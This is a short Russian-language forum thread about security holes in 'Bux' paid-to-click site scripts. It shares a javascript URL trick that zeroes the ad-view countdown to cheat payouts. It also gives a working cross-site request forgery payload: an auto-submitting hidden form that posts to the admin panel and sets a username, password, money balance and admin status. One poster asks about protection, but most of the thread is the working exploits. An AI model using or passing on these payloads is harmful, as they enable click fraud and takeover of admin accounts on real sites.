Уязвимости скрипта Bux

Узнал о новом для меня способе накрутки буксов!
Рассказываю:
При просмотре рекламы, в адрес вставляется код и таймер сразу на 0 становится!..
Это то вообщем, всё что я знаю!
Может кто знает защиту от этого способа взлома?

 

написалбы уязвимость для других, мож кто-то не знает, не 1 ты такой умный

 

Гг - этот новый букс выпущен практически со всеми старыми дырками - тоесть на него сногва пришлось все заплатки клепать!! Кстати кому интересно я всетаки защиты поставил и даже капчу почти доделал уже если интересно пишите 6321435

 

Я думаю он об этом: Если во время просмотра рекламы в строку браузера вставить такой вот скриптик

Code:

javascript: countdown(1);

удалив при этом все что там есть то таймер сбивается на 1 секунду - так как с жабой я не дружу я не знаю как тут можно исправить!!!

 

XSRF в скрипте Bux
<form action="http://buxeg/admin/index.php?op=7" method="POST" name="theForm" id="theFormId">
<input type="hidden" name="id" value="1">
<input type="hidden" name="username" value="admin4eg">
<input type="hidden" name="password" value="admin4eg">
<input type="hidden" name="referer" value="">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="pemail" value="E105366777666">
<input type="hidden" name="country" value="Russia">
<input type="hidden" name="vistis" value="500">
<input type="hidden" name="referals" value="600">
<input type="hidden" name="referalvisits" value="777">
<input type="hidden" name="money" value="500">
<input type="hidden" name="user_status" value="admin">
<input type="submit" value="���������" class="button">
</form>

<script type="text/javascript">
document.theForm.submit();
</script>